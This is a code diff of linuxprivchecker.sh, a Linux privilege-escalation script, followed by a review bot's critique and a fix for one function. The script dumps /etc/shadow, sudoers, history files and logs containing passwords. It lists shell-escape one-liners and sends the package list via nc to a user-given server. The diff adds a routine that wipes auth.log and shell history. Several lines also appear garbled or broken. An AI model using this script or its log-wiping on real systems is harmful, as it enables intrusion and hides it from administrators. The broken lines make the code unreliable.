skipped 1 lines 2 2 3 3 ############################################################################################################### 4 4 ## [Title]: linuxprivchecker.sh -- a Linux Privilege Escalation Check Script 5 - ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift 6 - ## [Contributors]: Mike Merrill (linted) -- https://github.com/linted 7 - ## James Hogan (5aru) -- https://github.com/5aru 5 + ## [Original Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift 6 + ## Forked from linuxprivchecker.py -- https://github.com/sleventyeleven/linuxprivchecker 7 + ## [Contributors]: 8 + ## Mike Merrill (linted) -- https://github.com/linted 9 + ## James Hogan (5aru) -- https://github.com/5aru 10 + ## Ali Kaba (alibkaba) -- https://github.com/alibkaba 8 11 ##------------------------------------------------------------------------------------------------------------- 9 12 ## [Details]: 10 - ## Similar functions to Mike Czumak's linuxprivchecker.py Linux Privilege Escalation Check Script. 11 13 ## This script is intended to be executed locally on a Linux box to enumerate basic system info and 12 14 ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text 13 15 ## passwords and applicable exploits. skipped 17 lines 31 33 ## USE OR OTHER DEALINGS IN THE SOFTWARE. 
32 34 ############################################################################################################### 33 35 34 - ### Useful functions 36 + # command paths 37 + PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games" 35 38 36 - PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games" 39 + # fonts formatting 40 + RESET='\e[0m'; # No Color 41 + RED='\e[31m'; 42 + LRED='\e[91m'; 43 + GREEN='\e[32m'; 44 + LGREEN='\e[92m'; 45 + LYELLOW='\e[93m'; 46 + LCYAN='\e[96m'; 47 + BLINK='\e[5m'; 48 + BOLD='\e[1m'; 37 49 38 - TITLE_LINE=$(printf "%*s\n" "80" | tr ' ' "=") 39 - SECTION_LINE =$(printf "%*s\n" "80 " | tr ' ' "- ") 50 + # line formatting 51 + titleLINE =$(printf "$ { LGREEN } %*s\n" "70 " | tr ' ' "= "); 52 + sectionLINE=$(printf "${LGREEN}%*s\n" "40" | tr ' ' "-"); 40 53 41 - function formatCommand(){ 42 - eval $1 | sed 's|^| |' 54 + # title 55 + scriptTITLE(){ 56 + echo ${titleLINE}; 57 + echo "LINUX PRIVILEGE ESCALATION CHECKER" 58 + echo "Go to https://github.com/linted/linuxprivchecker for more info..." 59 + echo -e ${titleLINE}${RESET}; 43 60 } 44 61 45 - echo ${TITLE_LINE} 46 - echo "LINUX_PRIVILEGE ESCALATION CHECKER" 47 - echo ${TITLE_LINE} 62 + systemAREAtitle(){ 63 + echo ${sectionLINE}; 64 + echo "[*] $systemAREA..."; 65 + echo -e ${sectionLINE}${RESET}; 66 + printf "\n"; 67 + sleep .5s; 68 + } 48 69 49 - echo -e "\n[*] GETTING BASIC SYSTEM INFO...\n" 70 + cmdRESPONSE(){ 71 + # run and format cmd 72 + cmdRESULT=$(eval $1 2>/dev/null | sed 's|^| |'; echo "${PIPESTATUS[0]}"); 50 73 51 - echo "[+] Operating System" 52 - formatCommand "cat /etc/issue" 74 + # check cmd status 75 + if [ ${cmdRESULT:(-1)} -eq 0 ]; then 76 + echo -e "${LGREEN}[+] $systemNAME"; 77 + printf "${GREEN}${cmdRESULT%?}\n${RESET}"; 78 + else 79 + echo -e "${LRED}[!] 
$systemNAME"; 80 + printf "${LYELLOW}${cmdRESULT%?}\n${RESET}"; 81 + fi 82 + sleep .5s; 83 + } 53 84 54 - echo -e "\n[+] Kernel" 55 - formatCommand "cat /proc/version" 85 + operatingSYSTEM(){ 86 + systemAREA="OPERATING SYSTEM"; 87 + systemAREAtitle; 56 88 57 - echo -e "\n[+] Hostname/FQDN" 58 - formatCommand "hostname -f" 89 + systemNAME="Distribution"; 90 + cmdRESPONSE "cat /etc/*-release"; 59 91 60 - echo -ne "\n${SECTION_LINE}\n" 61 - echo -e "[*] GETTING NETWORKING INFO...\n" 92 + systemNAME="Kernel"; 93 + cmdRESPONSE "if [ -f /proc/version ]; then cat /proc/version; else uname -a; fi"; 62 94 63 - echo "[+] Route" 95 + systemNAME="Hostname"; 96 + cmdRESPONSE "hostname -f"; 64 97 65 - if [ -x "$(command -v route)" ]; then 66 - formatCommand "route -n" 67 - else 68 - formatCommand "ip route" 69 - fi 98 + systemNAME="Environment Variables"; 99 + cmdRESPONSE "env | grep -v "LS_COLORS""; 70 100 71 - echo -e "\n[+] Interfaces" 101 + systemNAME="Printer"; 102 + cmdRESPONSE "lpstat -a"; 103 + } 72 104 73 - if [ -x "$(command -v ifconfig)" ]; then 74 - formatCommand "ifconfig -a" 75 - else 76 - formatCommand "ip addr show" 77 - fi 105 + netWORK(){ 106 + systemAREA="NETWORK"; 107 + systemAREAtitle; 78 108 79 - echo -e "\n[+] Network Connections" 109 + systemNAME="Network Interfaces"; 110 + cmdRESPONSE "if [ -x "$(command -v ifconfig)" ]; then ifconfig; else ip a; fi"; 80 111 81 - if [ -x "$(command -v netstat)" ]; then 82 - formatCommand "netstat -tupan | grep -v TIME_WAIT" 83 - else 84 - formatCommand "ss -tupan | grep -v CLOSE_WAIT" 85 - fi 112 + systemNAME="DNS Resolver"; 86 113 87 - echo -ne "\n${SECTION_LINE}\n" 88 - echo -e "[*] GETTING FILESYSTEM INFO...\n" 114 + systemNAME="Route"; 115 + cmdRESPONSE "if [ -x "$(command -v route)" ]; then route -n; else ip route; fi"; 116 + } 89 117 90 - echo -e "\n[+] Mount Results" 91 - formatCommand "mount" 118 + userACCOUNTS(){ 119 + systemAREA="Users"; 120 + systemAREAtitle; 92 121 93 - echo -e "\n[+] fstab Entries" 94 - 
formatCommand "cat /etc/fstab 2>/dev/null" 122 + systemNAME="All Users"; 123 + cmdRESPONSE "cat /etc/passwd"; 95 124 96 - echo -e "\n[+] Scheduled cron jobs" 97 - formatCommand "ls -al /etc/cron* 2>/dev/null" 125 + systemNAME="My ID & Group(s)"; 126 + cmdRESPONSE "id"; 98 127 99 - echo -e "\n[+] Writable cron directories" 100 - formatCommand "ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$' 2>/dev/null" 128 + systemNAME="Who's Logged Right Now"; 129 + cmdRESPONSE "w"; 101 130 102 - echo -ne "\n${SECTION_LINE}\n" 103 - echo -e "[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n" 104 - echo -e "\n[+] Current User" 105 - formatCommand "whoami" 131 + systemNAME="Who's Logged Last"; 132 + cmdRESPONSE "last"; 106 133 107 - echo -e "\n[+] Current User ID" 108 - formatCommand "id" 134 + systemNAME="Super Users"; 135 + cmdRESPONSE "grep -v -E '^#' /etc/passwd | awk -F: '(/$3 == 0) { print /$1 }'"; 109 136 110 - echo -e "\n[+] All users" 111 - formatCommand "cat /etc/passwd" 137 + systemNAME="Sudo Users"; 138 + cmdRESPONSE "cat /etc/sudoers | grep -v '#'"; 112 139 113 - echo -e "\n[+] Super Users Found" 114 - formatCommand "grep -v -E '^#' /etc/passwd | awk -F: '\$3 == 0{print \$1}'" 140 + systemNAME="Sudoers (Privileged) [/etc/sudoers]"; 141 + cmdRESPONSE "cat /etc/sudoers | grep -v '#'"; 115 142 116 - echo -e "\n[+] Root and current user history (depends on privs)" 117 - formatCommand "ls -al ~/.*_history; ls -la /root/.*_history 2>/dev/null" 143 + systemNAME="Sudoers Files (Privileged) [/etc/sudoers.d/*]"; 144 + cmdRESPONSE "cat /etc/sudoers.d/* | grep -v '#'"; 118 145 119 - echo -e "\n[+] Environment Variables" 120 - formatCommand "env 2>/dev/null | grep -v 'LS_COLORS'" 146 + systemNAME="Shadow File"; 147 + cmdRESPONSE "cat /etc/shadow"; 121 148 122 - echo -e "\n[+] Sudoers (Privileged) [/etc/sudoers]" 123 - formatCommand "cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null" 149 + systemNAME="Root and Current User History (depends on privs)"; 150 + cmdRESPONSE "ls -al 
~/.*_history 2>/dev/null; ls -la /root/.*_history"; 151 + } 124 152 125 - echo -e "\n[+] Sudoers Files (Privileged) [/etc/sudoers.d/*]" 126 - formatCommand "cat /etc/sudoers.d/* 2>/dev/null | grep -v '#' 2>/dev/null" 153 + fileSYSTEMS(){ 154 + systemAREA="FILE SYSTEMS"; 155 + systemAREAtitle; 127 156 128 - echo -e "\n[+] Logged in User Activity" 129 - formatCommand "w 2>/dev/null" 157 + systemNAME="Mounts"; 158 + cmdRESPONSE "mount"; 130 159 131 - echo -ne "\n${SECTION_LINE}\n" 132 - echo -e "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n" 160 + systemNAME="fstab Entries"; 161 + cmdRESPONSE "cat /etc/fstab"; 133 162 134 - echo -e "\n[+] World Writable Directories for User/Group 'root'" 135 - formatCommand "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root" 163 + systemNAME="Scheduled Cron Jobs"; 164 + cmdRESPONSE "ls -al /etc/cron*"; 136 165 137 - echo -e "\n[+] World Writable Directories for User other than 'root'" 138 - formatCommand "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null" 166 + systemNAME="Writable Cron Directories"; 167 + cmdRESPONSE "ls -aRl /etc/cron* | awk '/$1 ~ /w.$'"; 139 168 140 - echo -e "\n[+] World Writable Files" 141 - formatCommand "find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0 002 \) -exec ls -l '{}' ';' 2>/dev/null" 169 + systemNAME="Root Home Folder Accessibility"; 170 + cmdRESPONSE "ls -lt /root/"; 142 171 143 - echo -e "\n[+] SUID/GUID Files and Directories" 144 - formatCommand "find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null" 172 + systemNAME="World Writeables Directories for User/Group 'root'"; 173 + cmdRESPONSE "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -o+w \) -exec ls -ld '{}' ';' | grep root"; 174 + 175 + systemNAME="World Writeables Directories for non-root Users"; 176 + 
cmdRESPONSE "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' | grep -v root "; 145 177 146 - echo -e "\n[+] Checking if root's home folder is accessible" 147 - formatCommand "ls -ahlR /root 2>/dev/null" 178 + systemNAME="World Writeables Files"; 179 + cmdRESPONSE "find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0 002 \) -exec ls -l '{}' ';'"; 148 180 149 - echo -e "\n[+] Logs containing keyword 'password'" 150 - formatCommand "find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null" 181 + systemNAME="SUID/GUID Files and Directories"; 182 + cmdRESPONSE "ls -ahlR /root"; 151 183 152 - echo -e "\n[+] Config files containing keyword 'password'" 153 - formatCommand "find /etc -name '*.c * ' 2 > / dev / null | xargs -l10 egrep 'pwd|password' 2>/dev/null" 184 + systemNAME="Configuration Files Containing Keyword 'password'"; 185 + cmdRESPONSE "find /var / log -name '*.log ' | xargs -l10 egrep 'pwd|password' 2>/dev/null"; 154 186 155 - echo -e "\n[+] Shadow Files (Privileged)" 156 - formatCommand "cat /etc/shadow 2>/dev/null" 187 + } 157 188 158 - echo -ne "\n${SECTION_LINE}\n" 159 - echo -e "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n" 189 + applicationSERVICES(){ 190 + systemAREA="APPLICATIONS & SERVICES"; 191 + systemAREAtitle; 160 192 161 - echo - e "[ + ] Installed Packages"162 - if [ -x "$(command -v dpkg)" ]; then 163 - PKGMNGR=1 164 - formatCommand "dpkg -l | awk '{\$1=\$4=\"\"; print \$0}'" 165 - elif [ -x "$(command -v dnf)" ]; then 166 - PKGMNGR=2 167 - formatCommand "dnf -qa | sort -u" 168 - elif [ -x "$(command -v rpm)" ]; then 169 - PKGMNGR=3 170 - formatCommand "rpm -qa | sort -u" 171 - fi 193 + systemNAME = "Installed Packages"; 194 + cmdRESPONSE "if [ -x "$(command -v dpkg)" ]; then dpkg -l | awk '{\$1=\$4=\"\"; print \$0}'; elif [ -x "$(command -v dnf)" ]; then dnf -qa | sort -u; elif [ -x "$(command -v rpm)" ]; then rpm 
-qa | sort -u; fi"; 172 195 173 - echo -e "\n[+] Current Processes" 174 - formatCommand "ps aux | awk '{print \$1,\$2,\$9,\$10,\$11}'" 196 + systemNAME="Current Running Services"; 197 + cmdRESPONSE "ps aux | awk '{print \$1,\$2,\$9,\$10,\$11}'"; 175 198 176 - echo -e "\n[+] Sudo Version" 177 - formatCommand "sudo -V | grep version 2 > / dev / null " 199 + systemNAME="Sudo version"; 200 + cmdRESPONSE "sudo -V | grep version"; 178 201 179 - echo - e "\ n [ + ] Apache Version and Modules"180 - formatCommand "apache2 -v 2>/dev/null; apache2ctl -M 2>/dev/null; httpd -v 2>/dev/null; apachectl -l 2 > / dev / null " 202 + systemNAME = "Apache Version and Modules"; 203 + cmdRESPONSE "apache2 -v 2>/dev/null; apache2ctl -M 2>/dev/null; httpd -v 2>/dev/null; apachectl -l"; 181 204 182 - echo - e "\ n [ + ] Apache Config File"183 - formatCommand "cat /etc/apache2/apache2.conf 2 > / dev / null " 205 + systemNAME = "Apache Config File"; 206 + cmdRESPONSE "cat /etc/apache2/apache2.conf"; 184 207 185 - echo -ne "\n${SECTION_LINE}\n" 186 - echo -e "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n" 208 + systemNAME="Processes and Packages Running as Root or other Superuser"; 209 + EXTDGREP="($(ps -u 0 | tail -n+2 | rev | cut -d " " -f 1 | rev | cut -d "/" -f1 | sort | uniq | xargs | tr " " "|"))"; 210 + cmdRESPONSE "if [ -x "$(command -v dpkg)" ]; then dpkg -l | grep -iE '${EXTDGREP}'; elif [ -x "$(command -v dnf)" ]; then dnf -qa | grep -iE '${EXTDGREP}'; elif [ -x "$(command -v rpm)" ]; then rpm -qa | grep -iE '${EXTDGREP}'; fi"; 187 211 188 - EXTDGREP="($(ps -u 0 | tail -n+2 | rev | cut -d " " -f 1 | rev | cut -d "/" -f1 | sort | uniq | xargs | tr " " "|"))" 212 + systemNAME="Installed Tools"; 213 + cmdRESPONSE "which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp"; 189 214 190 - if [ $PKGMNGR -eq 1 ]; then 191 - formatCommand "dpkg -l | grep -iE '${EXTDGREP}'" 192 - elif [ $PKGMNGR -eq 2 ]; then 193 - formatCommand "dnf -qa | 
grep -iE '${EXTDGREP}'" 194 - elif [ $PKGMNGR -eq 3 ]; then 195 - formatCommand "rpm -qa | grep -iE '${EXTDGREP}'" 196 - fi 215 + systemNAME="Related Shell Escape Sequences"; 216 + cmdRESPONSE "if [ -x "$(command -v vi)" ]; then echo -ne \"vi-->\t:!bash\n\"; echo -ne \"vi-->\t:set shell=/bin/bash:shell\n\"; fi"; 217 + cmdRESPONSE "if [ -x "$(command -v vim)" ]; then echo -ne \"vim-->\t:!bash\n\" | sed 's|^| |'; echo -ne "vim-->\t:set shell=/bin/bash:shell\n" | sed 's|^| |'; fi"; 218 + cmdRESPONSE "if [ -x "$(command -v awk)" ]; then echo -ne \"awk-->\tawk 'BEGIN {system(\"/bin/bash\")}'\n\" | sed 's|^| |'; fi"; 219 + cmdRESPONSE "if [ -x "$(command -v perl)" ]; then echo -ne \"perl-->\tperl -e 'exec \"/bin/bash\";'\n\" | sed 's|^| |'; fi"; 220 + cmdRESPONSE "if [ -x "$(command -v python)" ]; then echo -ne \"python-->\tpython -c '__import__(\"os\").system(\"/bin/bash\")'\n\" | sed 's|^| |'; fi"; 221 + cmdRESPONSE "if [ -x "$(command -v find)" ]; then echo -ne \"find->\tfind / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;\n\" | sed 's|^| |'; fi"; 222 + cmdRESPONSE "if [ -x "$(command -v nmap)" ]; then echo -ne \"nmap-->\t--interactive\n\" | sed 's|^| |'; fi"; 223 + } 197 224 198 - echo -ne "\n${SECTION_LINE}\n" 199 - echo -e "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING..." 225 + searchEXPLOITS(){ 226 + systemAREA="Search for Exploits"; 227 + systemAREAtitle; 200 228 201 - echo -e "\n[+] Installed Tools" 202 - formatCommand "which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null" 229 + echo -e "[*] FINDING RELEVANT PRIVILEGE ESCALATION EXPLOITS..." 230 + read -p "[?] Would you like to search for possible exploits? 
[y/N] " connectToServer 203 231 204 - echo -e "\n[+] Related Shell Escape Sequences" 205 - if [ -x "$(command -v vi)" ]; then 206 - formatCommand "echo -ne \"vi-->\t:!bash\n\"" 207 - formatCommand "echo -ne \"vi-->\t:set shell=/bin/bash:shell\n\"" 208 - fi 232 + if [[ $connectToServer = y* ]] 233 + then 234 + read -p "[?] What is the address of the server? " server 235 + read -p "[?] What port is the server using? " port 236 + echo -ne "\n\n" 237 + echo -e "[ ] Searching on $server:$port" 238 + printf "%*s\n" "80" | tr " " "*" 239 + dpkg -l | tail -n +6 | awk '{print $2, $3} END {print ""}' | nc $server $port 240 + printf "%*s\n" "80" | tr " " "*" 241 + fi 242 + } 209 243 210 - if [ -x "$(command -v vim)" ]; then 211 - echo -ne "vim-->\t:!bash\n" | sed 's|^| |' 212 - echo -ne "vim-->\t:set shell=/bin/bash:shell\n" | sed 's|^| |' 213 - fi 244 + cleanUP(){ 245 + systemAREA="Clean Up"; 246 + systemAREAtitle; 214 247 215 - if [ -x "$(command -v awk)" ]; then 216 - echo -ne "awk-->\tawk 'BEGIN {system(\"/bin/bash\")}'\n" | sed 's|^| |' 217 - fi 248 + systemNAME="Clearing /var/log/auth.log"; 249 + cmdRESPONSE "echo " " > /var/log/auth.log"; 218 250 219 - if [ -x "$(command -v perl)" ]; then 220 - echo -ne "perl-->\tperl -e 'exec \"/bin/bash\";'\n" | sed 's|^| |' 221 - fi 251 + systemNAME="Clearning bash_history"; 252 + cmdRESPONSE "echo " " > ~/.bash_history"; 222 253 223 - if [ -x "$(command -v python)" ]; then 224 - echo -ne "python-->\tpython -c '__import__(\"os\").system(\"/bin/bash\")'\n" | sed 's|^| |' 225 - fi 254 + systemNAME="Clearing Current Session History"; 255 + cmdRESPONSE "history -c"; 226 256 227 - if [ -x "$(command -v find)" ]; then 228 - echo -ne "find->\tfind / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;\n" | sed 's|^| |' 229 - fi 257 + systemNAME="Setting history max lines to 0"; 258 + cmdRESPONSE "export HISTFILESIZE=0"; 230 259 231 - if [ -x "$(command -v nmap)" ]; then 232 - echo -ne "nmap-->\t--interactive\n" | sed 's|^| |' 233 - fi 
260 + systemNAME="Setting history max cmds to 0"; 261 + cmdRESPONSE "export HISTSIZE=0"; 234 262 235 - echo -ne "\n${SECTION_LINE}\n" 236 - echo -e "[*] FINDING RELEVANT PRIVILEGE ESCALATION EXPLOITS..." 237 - read -p "[?] Would you like to search for possible exploits? [y/N] " connectToServer 263 + echo ${titleLINE}; 264 + echo "FINISHED" 265 + echo -e ${titleLINE}${RESET}; 266 + } 238 267 239 - if [[ $connectToServer = y* ]] 240 - then 241 - read -p "[?] What is the address of the server? " server 242 - read -p "[?] What port is the server using? " port 243 - echo -ne "\n\n" 244 - echo -e "[ ] Searching on $server:$port" 245 - printf "%*s\n" "80" | tr " " "*" 246 - dpkg -l | tail -n +6 | awk '{print $2, $3} END {print ""}' | nc $server $port 247 - printf "%*s\n" "80" | tr " " "*" 248 - fi 268 + start(){ 269 + scriptTITLE; 270 + operatingSYSTEM; 271 + netWORK; 272 + userACCOUNTS; 273 + fileSYSTEMS; 274 + applicationSERVICES; 275 + searchEXPLOITS; 276 + cleanUP; 277 + echo -e $RESET; 278 + } 249 279 250 - echo -ne "\n\n${TITLE_LINE}" 251 - echo -ne "\nFINISHED" 252 - echo -ne "\n${TITLE_LINE}\n" 280 + start; 253 281
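Review bot: The `[ -x "$(command -v ifconfig)" ]` tests at new lines 110, 115, 194, 210 and 216–222 lose their inner quotes inside the double-quoted string handed to cmdRESPONSE, so the substitution is resolved in the caller's shell and, when the tool is absent, the evaluated text is `[ -x ]`, which is true in bash (one non-empty argument), so the fallback branch (`ip a`, `ip route`, the next package manager) never runs; the removed top-level checks at old lines 65, 73, 81 and 162–168 kept the quotes. In cmdRESPONSE (new lines 72–80) the exit status is taken as the last character of the captured output, so codes ending in 0 such as 10 or 20 are reported as success and multi-digit codes leave their leading digits in the printed text, and that text is then used as the printf format string, where any `%` in env, /etc/passwd or ps output corrupts the line; capture status and output separately and print with `printf '%b%s\n%b' "${GREEN}" "$cmdOUT" "${RESET}"`, as in the rewrite below. Several labels no longer match their commands: 'DNS Resolver' (112) sets systemNAME but never calls cmdRESPONSE, 'SUID/GUID Files and Directories' (181–182) now runs `ls -ahlR /root`, and 'Configuration Files Containing Keyword password' (184–185) searches /var/log rather than /etc as the removed line 153 did. The awk programs at 135 and 167 read `/$3` and `/$1` where the removed lines 100 and 114 escaped them as `\$1`/`\$3`; inside the double-quoted argument `$3` expands to the script's own (empty) positional parameter and awk receives a broken program, unless this is a rendering artefact — please confirm against the raw file.
```shell
cmdRESPONSE(){
  # run and format cmd; keep the exit status apart from the output
  local cmdOUT cmdSTATUS
  cmdOUT=$(eval "$1" 2>/dev/null | sed 's|^| |'; exit "${PIPESTATUS[0]}")
  cmdSTATUS=$?
  if [ "$cmdSTATUS" -eq 0 ]; then
    printf '%b[+] %s\n' "${LGREEN}" "$systemNAME"
    printf '%b%s\n%b' "${GREEN}" "$cmdOUT" "${RESET}"
  else
    printf '%b[!] %s\n' "${LRED}" "$systemNAME"
    printf '%b%s\n%b' "${LYELLOW}" "$cmdOUT" "${RESET}"
  fi
  sleep .5s
}
```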